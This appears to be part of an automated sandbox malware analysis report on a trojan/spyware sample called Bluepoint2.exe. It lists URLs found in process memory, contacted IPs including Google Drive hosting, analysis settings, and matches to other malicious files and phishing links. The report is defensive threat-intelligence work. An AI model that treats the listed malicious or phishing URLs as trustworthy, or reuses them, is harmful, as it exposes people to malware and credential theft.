                          http://www.postsignum.cz/crl/psrootqca2.crl02CasPol.exe, 0000000B.00000003.84173692774.0000000020907000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://crl.dhimyotis.com/certignarootca.crl0CasPol.exe, 0000000B.00000003.84178091797.000000002094A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173448689.0000000020949000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173099317.0000000020941000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0CasPol.exe, 0000000B.00000003.84177673427.00000000208E9000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.chambersign.org1CasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173099317.0000000020941000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.pkioverheid.nl/policies/root-policy0CasPol.exe, 0000000B.00000003.84172452925.000000002094E000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://repository.swisssign.com/0CasPol.exe, 0000000B.00000003.84177851316.00000000208DB000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173692774.0000000020907000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88426483436.00000000208E7000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.suscerte.gob.ve/lcr0#CasPol.exe, 0000000B.00000003.84177851316.00000000208DB000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173099317.0000000020941000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://crl.ssc.lt/root-c/cacrl.crl0CasPol.exe, 0000000B.00000003.84172452925.000000002094E000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://postsignum.ttc.cz/crl/psrootqca2.crl0CasPol.exe, 0000000B.00000003.84173692774.0000000020907000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crlCasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://ca.disig.sk/ca/crl/ca_disig.crl0CasPol.exe, 0000000B.00000003.84172452925.000000002094E000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://crl1.comsign.co.il/crl/comsignglobalrootca.crl0CasPol.exe, 0000000B.00000003.84177569419.0000000020904000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.certplus.com/CRL/class3P.crl0CasPol.exe, 0000000B.00000003.84172452925.000000002094E000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.suscerte.gob.ve/dpc0CasPol.exe, 0000000B.00000003.84177851316.00000000208DB000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173099317.0000000020941000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.certeurope.fr/reference/root2.crl0CasPol.exe, 0000000B.00000003.84178155401.000000001D89D000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.certplus.com/CRL/class2.crl0CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.disig.sk/ca/crl/ca_disig.crl0CasPol.exe, 0000000B.00000003.84172452925.000000002094E000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://eca.hinet.net/repository/Certs/IssuedToThisCA.p7b05CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.defence.gov.au/pki0CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://drive.google.com/CasPol.exe, 0000000B.00000002.88393681218.000000000116B000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://COMTWSUUu1KHWCDXUrc.orgCasPol.exe, 0000000B.00000002.88417087670.000000001DA31000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88417894520.000000001DAE6000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.sk.ee/cps/0CasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.globaltrust.info0=CasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173099317.0000000020941000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		low
                                    http://www.anf.esCasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_1_0.pdf09CasPol.exe, 0000000B.00000003.84173692774.0000000020907000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://pki.registradores.org/normativa/index.htm0CasPol.exe, 0000000B.00000003.84172452925.000000002094E000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://doc-10-20-docs.googleusercontent.com/LCasPol.exe, 0000000B.00000003.84082718094.00000000011F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://cps.root-x1.letsencrypt.org0CasPol.exe, 0000000B.00000002.88415384631.000000001D7C0000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88415904285.000000001D81A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88393971968.00000000011A7000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88418119268.000000001DB18000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88426802779.000000002093E000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://policy.camerfirma.com0CasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.ssc.lt/cps03CasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84172452925.000000002094E000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://ocsp.pki.gva.es0CasPol.exe, 0000000B.00000003.84173692774.0000000020907000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.anf.es/es/address-direccion.htmlCasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.anf.es/address/)1(0&CasPol.exe, 0000000B.00000003.84177673427.00000000208E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?CasPol.exe, 0000000B.00000003.84173692774.0000000020907000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://ca.mtin.es/mtin/ocsp0CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://cps.letsencrypt.org0CasPol.exe, 0000000B.00000002.88415384631.000000001D7C0000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88418601335.000000001DB85000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88418119268.000000001DB18000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88426802779.000000002093E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://crl.ssc.lt/root-b/cacrl.crl0CasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://web.ncdc.gov.sa/crl/nrcacomb1.crl0CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.certicamara.com/dpc/0ZCasPol.exe, 0000000B.00000003.84177673427.00000000208E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0GCasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://crl.pki.wellsfargo.com/wsprca.crl0CasPol.exe, 0000000B.00000003.84177851316.00000000208DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://doc-10-20-docs.googleusercontent.com/sJcfCasPol.exe, 0000000B.00000002.88393971968.00000000011A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://wwww.certigna.fr/autorites/0mCasPol.exe, 0000000B.00000003.84178091797.000000002094A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173448689.0000000020949000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173099317.0000000020941000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0CasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwCasPol.exe, 0000000B.00000002.88417087670.000000001DA31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://ca.mtin.es/mtin/DPCyPoliticas0CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://www.anf.es/AC/ANFServerCA.crl0CasPol.exe, 0000000B.00000003.84177673427.00000000208E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://nsis.sf.net/NSIS_ErrorErrorBluepoint2.exefalse
                                                          		high
                                                          http://www.globaltrust.info0CasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173099317.0000000020941000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://certificates.starfieldtech.com/repository/1604CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://doc-10-20-docs.googleusercontent.com/CasPol.exe, 0000000B.00000003.84082718094.00000000011F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://acedicom.edicomgroup.com/doc0CasPol.exe, 0000000B.00000003.84177851316.00000000208DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.certplus.com/CRL/class3TS.crl0CasPol.exe, 0000000B.00000002.88415384631.000000001D7C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://doc-10-20-docs.googleusercontent.com/DJCasPol.exe, 0000000B.00000002.88393971968.00000000011A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://crl.anf.es/AC/ANFServerCA.crl0CasPol.exe, 0000000B.00000003.84177673427.00000000208E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.certeurope.fr/reference/pc-root2.pdf0CasPol.exe, 0000000B.00000003.84178155401.000000001D89D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://ac.economia.gob.mx/last.crl0GCasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173099317.0000000020941000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://www.catcert.net/verarrelCasPol.exe, 0000000B.00000003.84172452925.000000002094E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.disig.sk/ca0fCasPol.exe, 0000000B.00000003.84172452925.000000002094E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.e-szigno.hu/RootCA.crlCasPol.exe, 0000000B.00000003.84172452925.000000002094E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.sk.ee/juur/crl/0CasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://crl.chambersign.org/chambersignroot.crl0CasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173099317.0000000020941000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://certs.oati.net/repository/OATICA2.crl0CasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://crl.oces.trust2408.com/oces.crl0CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://www.quovadis.bm0CasPol.exe, 0000000B.00000003.84177851316.00000000208DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://eca.hinet.net/repository0CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://crl.ssc.lt/root-a/cacrl.crl0CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://certs.oaticerts.com/repository/OATICA2.crlCasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.trustdst.com/certificates/policy/ACES-index.html0CasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://certs.oati.net/repository/OATICA2.crt0CasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.accv.es00CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.pkioverheid.nl/policies/root-policy-G20CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://www.netlock.net/docsCasPol.exe, 0000000B.00000003.84177569419.0000000020904000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.e-trust.be/CPS/QNcertsCasPol.exe, 0000000B.00000003.84173493102.000000002095E000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173692774.0000000020907000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84172452925.000000002094E000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://ocsp.ncdc.gov.sa0CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://fedir.comsign.co.il/crl/ComSignCA.crl0CasPol.exe, 0000000B.00000003.84177851316.00000000208DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://XkBFAe.comCasPol.exe, 0000000B.00000002.88417087670.000000001DA31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0CasPol.exe, 0000000B.00000003.84173692774.0000000020907000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://web.ncdc.gov.sa/crl/nrcaparta1.crlCasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://www.datev.de/zertifikat-policy-int0CasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://fedir.comsign.co.il/crl/comsignglobalrootca.crl0;CasPol.exe, 0000000B.00000003.84177569419.0000000020904000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://repository.luxtrust.lu0CasPol.exe, 0000000B.00000003.84172452925.000000002094E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://cps.chambersign.org/cps/chambersroot.html0CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://www.acabogacia.org0CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://ocsp.eca.hinet.net/OCSP/ocspG2sha20CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.firmaprofesional.com/cps0CasPol.exe, 0000000B.00000003.84177569419.0000000020904000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.uce.gub.uy/acrn/acrn.crl0CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://www.avast.com0/Bluepoint2.exe, 00000002.00000002.84106911540.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, Bluepoint2.exe, 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmp, lang-1026.dll.2.drfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://crl.securetrust.com/SGCA.crl0CasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88426802779.000000002093E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown

                                                                                    World Map of Contacted IPs

                                                                                    • No. of IPs < 25%
                                                                                    • 25% < No. of IPs < 50%
                                                                                    • 50% < No. of IPs < 75%
                                                                                    • 75% < No. of IPs

                                                                                    Public IPs

                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                    81.25.126.48
                                                                                    		CE2020050617001.dnssw.netSpain
                                                                                    		41541SWEB-ASServeiswebESfalse
                                                                                    142.250.185.161
                                                                                    		googlehosted.l.googleusercontent.comUnited States
                                                                                    		15169GOOGLEUSfalse
                                                                                    142.250.184.206
                                                                                    		drive.google.comUnited States
                                                                                    		15169GOOGLEUSfalse

                                                                                    General Information

                                                                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                    Analysis ID:625508
                                                                                    Start date and time: 12/05/202219:38:232022-05-12 19:38:23 +02:00
                                                                                    Joe Sandbox Product:CloudBasic
                                                                                    Overall analysis duration:0h 13m 8s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Sample file name:Bluepoint2.exe
                                                                                    Cookbook file name:default.jbs
                                                                                    Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                    Run name:Suspected Instruction Hammering
                                                                                    Number of analysed new started processes analysed:25
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:0
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • HDC enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Analysis stop reason:Timeout
                                                                                    Detection:MAL
                                                                                    Classification:mal100.troj.spyw.evad.winEXE@6/8@3/3
                                                                                    EGA Information:
                                                                                    • Successful, ratio: 100%
                                                                                    HDC Information:
                                                                                    • Successful, ratio: 36.3% (good quality ratio 35.7%)
                                                                                    • Quality average: 89.3%
                                                                                    • Quality standard deviation: 20.3%
                                                                                    HCA Information:
                                                                                    • Successful, ratio: 98%
                                                                                    • Number of executed functions: 235
                                                                                    • Number of non-executed functions: 46
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .exe
                                                                                    • Adjust boot time
                                                                                    • Enable AMSI

                                                                                    Warnings

                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
                                                                                    • Excluded IPs from analysis (whitelisted): 20.93.58.141, 8.250.177.254, 8.252.74.126, 8.252.191.254, 8.247.116.126, 8.250.203.254, 8.250.164.126, 8.250.188.126
                                                                                    • Excluded domains from analysis (whitelisted): wd-prod-cp-eu-north-3-fe.northeurope.cloudapp.azure.com, wdcpalt.microsoft.com, client.wns.windows.com, fg.download.windowsupdate.com.c.footprint.net, ctldl.windowsupdate.com, img-prod-cms-rt-microsoft-com.akamaized.net, wdcp.microsoft.com, arc.msn.com, wd-prod-cp.trafficmanager.net, wu-bg-shim.trafficmanager.net
                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                    Simulations

                                                                                    Behavior and APIs

                                                                                    TimeTypeDescription
                                                                                    19:41:29API Interceptor3911x Sleep call for process: CasPol.exe modified

                                                                                    Joe Sandbox View / Context

                                                                                    IPs

                                                                                    No context

                                                                                    Domains

                                                                                    No context

                                                                                    ASNs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                    SWEB-ASServeiswebESLAUPbsFSB.exeGet hashmaliciousBrowse
                                                                                    • 81.25.112.101

                                                                                    JA3 Fingerprints

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                    37f463bf4616ecd445d4a1937da06e19#Ud83d#Udcde_00725203590987252035972520359.html.htmlGet hashmaliciousBrowse
                                                                                    • 142.250.185.161
                                                                                    • 142.250.184.206
                                                                                    SecuriteInfo.com.Heur.906.xlsxGet hashmaliciousBrowse
                                                                                    • 142.250.185.161
                                                                                    • 142.250.184.206
                                                                                    https://nwfparolinv.org/Get hashmaliciousBrowse
                                                                                    • 142.250.185.161
                                                                                    • 142.250.184.206
                                                                                    ZsWsTpcjoR.exeGet hashmaliciousBrowse
                                                                                    • 142.250.185.161
                                                                                    • 142.250.184.206
                                                                                    https://invierteenmiproyecto.com/rey/index.phpGet hashmaliciousBrowse
                                                                                    • 142.250.185.161
                                                                                    • 142.250.184.206
                                                                                    Invoice_Doubleline-Doubleline.com171883.htmlGet hashmaliciousBrowse
                                                                                    • 142.250.185.161
                                                                                    • 142.250.184.206
                                                                                    Invreceipt7291XZ4-BWGI7X-RHL3xfh339.htmGet hashmaliciousBrowse
                                                                                    • 142.250.185.161
                                                                                    • 142.250.184.206
                                                                                    SecuriteInfo.com.W32.AIDetect.malware2.8516.exeGet hashmaliciousBrowse
                                                                                    • 142.250.185.161
                                                                                    • 142.250.184.206
                                                                                    P.O New Order.exeGet hashmaliciousBrowse
                                                                                    • 142.250.185.161
                                                                                    • 142.250.184.206
                                                                                    EFT-Payment1220_ fdp.HTmGet hashmaliciousBrowse
                                                                                    • 142.250.185.161
                                                                                    • 142.250.184.206
                                                                                    https://iguana-rhombus-k5fl.squarespace.com/Get hashmaliciousBrowse
                                                                                    • 142.250.185.161
                                                                                    • 142.250.184.206
                                                                                    https://rb.gy/ne8hscGet hashmaliciousBrowse
                                                                                    • 142.250.185.161
                                                                                    • 142.250.184.206
                                                                                    INV#00519.xlsxGet hashmaliciousBrowse
                                                                                    • 142.250.185.161
                                                                                    • 142.250.184.206
                                                                                    doc_65398086_4190362045539.pdf.vbsGet hashmaliciousBrowse
                                                                                    • 142.250.185.161
                                                                                    • 142.250.184.206
                                                                                    PO-19903.vbsGet hashmaliciousBrowse
                                                                                    • 142.250.185.161
                                                                                    • 142.250.184.206
                                                                                    SD 2477.exeGet hashmaliciousBrowse
                                                                                    • 142.250.185.161
                                                                                    • 142.250.184.206
                                                                                    FIREANGEL SAFETY TECHNOLOGY PLC.htmlGet hashmaliciousBrowse
                                                                                    • 142.250.185.161
                                                                                    • 142.250.184.206
                                                                                    https://login-auth4gpzpzddt7z5sf8a71rh1rhqw9aq0bmjd7m4jszkr22.website.yandexcloud.net/?sscid=51k6_burmo#res@res.esGet hashmaliciousBrowse
                                                                                    • 142.250.185.161
                                                                                    • 142.250.184.206
                                                                                    SecuriteInfo.com.Variant.Jaik.72893.16950.exeGet hashmaliciousBrowse
                                                                                    • 142.250.185.161
                                                                                    • 142.250.184.206
                                                                                    https://ad.doubleclick.net/ddm/clk/457245084;261660784;o;u=ds&sv1=64659318519&sv2=3270347400160313&sv3=5513163273413763428&gclid=CJykqNzo5fMCFclCHQkdk2EFmQ;%3fhttps://redirect.skimlinks.com/?id%253D179135X1650605%2526xs%253D1%2526url=http%3A%2F%2Fwww.amazon.com%2Famazon%2Famazon%2Famazon3696717%2F&url=https%3A%2F%2Flogin-sok7upku1isa34nsmlu5maqmq7an2i5x6ubb0ztdtsh.website%E2%80%8B.yandexcloud.net%23j.jainaga@sidenor.comGet hashmaliciousBrowse
                                                                                    • 142.250.185.161
                                                                                    • 142.250.184.206

